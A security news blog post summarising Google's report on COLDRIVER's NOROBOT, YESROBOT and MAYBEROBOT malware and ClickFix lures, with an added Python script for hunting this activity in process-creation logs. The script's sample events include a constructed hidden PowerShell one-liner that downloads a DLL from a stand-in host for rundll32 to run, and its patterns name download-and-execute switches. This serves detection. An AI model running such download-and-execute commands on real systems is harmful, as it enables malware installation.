Google Unmasks Three New Russian Malware Families Linked to COLDRIVER Hackers
- John Jordan
- 2 days ago
- 2 min read
Updated: 20 hours ago
Google Threat Intelligence Group (GTIG) has identified three new malware families, NOROBOT, YESROBOT, and MAYBEROBOT, developed by the Russia-linked hacking group COLDRIVER. The new tools mark a notable evolution in the group's tactics, techniques, and procedures, pointing to an increased operational tempo and a shift from pure credential phishing toward malware delivery.

Key Takeaways
Google has identified three new malware families: NOROBOT, YESROBOT, and MAYBEROBOT, attributed to the COLDRIVER hacking group.
These new malware families show an "increased operations tempo" from the threat actor.
The group has expanded beyond its usual credential theft and now uses ClickFix-style lures to get malware onto victim machines.
Separately, recent arrests in the Netherlands involve teenagers suspected of providing services to a foreign government, one of whom was allegedly in contact with a hacker group affiliated with the Russian government.
Evolving Malware Arsenal
The newly discovered malware families are interconnected through a shared delivery chain. COLDRIVER has historically focused on stealing credentials from high-profile individuals such as NGO staff, policy advisors, and dissidents; its recent activity instead relies on ClickFix-style lures. These lures trick the user into copying a malicious PowerShell command and pasting it into the Windows Run dialog, usually under the guise of a fake CAPTCHA verification prompt, so that the victim, not an exploit, launches the first stage.
The ROBOT Malware Family
The "ROBOT" family follows COLDRIVER's earlier intrusions that deployed the LOSTKEYS information-stealing malware. NOROBOT and MAYBEROBOT are also tracked by Zscaler ThreatLabz as BAITSWITCH and SIMPLEFIX, respectively. The infection chain begins with a ClickFix-style HTML lure that GTIG calls COLDCOPY, which drops a DLL named NOROBOT. The DLL is executed via rundll32.exe and retrieves the next-stage malware.
Initially, these attacks delivered a Python backdoor known as YESROBOT. The threat actors later switched to a PowerShell implant named MAYBEROBOT. YESROBOT is a minimal backdoor that polls a hard-coded command-and-control (C2) server over HTTPS for commands; it can download and execute files and retrieve documents. Only two deployments of YESROBOT have been observed.
MAYBEROBOT is more flexible and extensible: it can download and run a payload from a specified URL, execute commands through cmd.exe, and run arbitrary PowerShell code, all using tooling already present on a Windows host, whereas a Python backdoor needs a Python runtime on the victim machine. GTIG assesses that YESROBOT was a stopgap deployed in response to the public disclosure of LOSTKEYS, and that MAYBEROBOT then replaced it.
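The two observable steps of the chain described above, a PowerShell command launched from the Run dialog and rundll32.exe loading a DLL from a user-writable directory, both leave traces in process-creation telemetry. The following Python script is an added example, not code from the original article or from Google/GTIG, showing how a defender might hunt for those traces. The log records are constructed Sysmon Event ID 1-style events, the command lines are illustrative rather than captured COLDRIVER samples, and the pattern lists are assumptions to tune for your environment.

```python
"""Hunting for ClickFix-style execution and rundll32 DLL staging in process-creation logs.

Added example, not code from the article or from Google/GTIG. The events below are
constructed Sysmon Event ID 1 style records (fields ParentImage/Image/CommandLine),
not captured COLDRIVER telemetry; the command lines are illustrative. The pattern
lists are assumptions and should be tuned for the environment.
"""
import ntpath
import re

# Script/LOLBin hosts that a ClickFix lure typically asks the victim to launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line switches common in paste-and-run lures (assumption, not a COLDRIVER IOC list).
SUSPICIOUS_PS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc(odedcommand)?)?\s|-e(xecutionpolicy|p)\s+bypass"
    r"|\biwr\b|invoke-webrequest|downloadstring|\biex\b|invoke-expression)",
    re.IGNORECASE,
)

# Directories an unprivileged user can write to; a DLL handed to rundll32 from here is unusual.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+|AppData|Temp|Downloads|ProgramData|Public)\\", re.IGNORECASE
)

# First DLL-looking argument to rundll32 ("rundll32.exe C:\path\x.dll,Export").
RUNDLL_DLL_ARG = re.compile(r'(?P<dll>[^\s",]+\.dll)', re.IGNORECASE)

# Constructed sample events. Events 2 and 3 model the chain in the text: a PowerShell
# one-liner pasted into the Run dialog (parent explorer.exe) that fetches a stage into
# %TEMP%, then rundll32.exe loading that DLL. Events 1 and 4 are benign activity.
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'},
    {"id": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -ep bypass -c "iwr https://example.invalid/c.html -OutFile $env:TEMP\c.dll"'},
    {"id": 3, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\c.dll,Start"},
    {"id": 4, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


def _base(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def detect(event):
    """Return the list of rule names the event triggers (empty if nothing fires)."""
    parent, image, cmd = _base(event["ParentImage"]), _base(event["Image"]), event["CommandLine"]
    findings = []
    # Rule 1: ClickFix shape - a script host spawned directly by explorer.exe
    # (Run dialog or pasted command) with hide/download switches on its command line.
    if parent == "explorer.exe" and image in SCRIPT_HOSTS and SUSPICIOUS_PS.search(cmd):
        findings.append("clickfix_run_dialog")
    if image == "rundll32.exe":
        # Rule 2: rundll32 executing a DLL that lives in a user-writable directory.
        m = RUNDLL_DLL_ARG.search(cmd)
        if m and USER_WRITABLE.search(m.group("dll")):
            findings.append("rundll32_user_writable_dll")
        # Rule 3: rundll32 launched by a script host rather than a service or installer.
        if parent in SCRIPT_HOSTS:
            findings.append("rundll32_from_script_host")
    return findings


def scan(events):
    """Map event id -> triggered rules, for every event that fires at least one rule."""
    return {e["id"]: f for e in events if (f := detect(e))}


if __name__ == "__main__":
    for eid, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {eid}: {', '.join(rules)}")
```

On the sample data, event 2 fires the ClickFix rule and event 3 fires both rundll32 rules, while the benign notepad and services-spawned rundll32 events stay quiet. During triage of a suspected ClickFix infection it is also worth pulling the Run dialog history from `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, since the pasted command is usually still recorded there.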
Shifting Tactics and Potential Espionage
Google suggests that NOROBOT and MAYBEROBOT are likely reserved for high-value targets, probably individuals first compromised through phishing, with the goal of collecting additional intelligence. NOROBOT has kept evolving: at one point the cryptographic keys needed to decrypt the next stage were split across multiple components of the delivery chain, so that no single recovered artifact is enough to unpack the payload. GTIG reads these changes as COLDRIVER's effort to stay ahead of detection and keep its intelligence collection running.
This development coincides with news from the Netherlands, where three 17-year-olds are suspected of providing services to a foreign government. One suspect is alleged to have been in contact with a hacker group affiliated with the Russian government, sharing information gathered by mapping Wi-Fi networks that could support digital espionage and cyber attacks.
As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.
Sources
Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers, The Hacker News.
Google identifies new malware linked to Russia-based hacking group, Yahoo.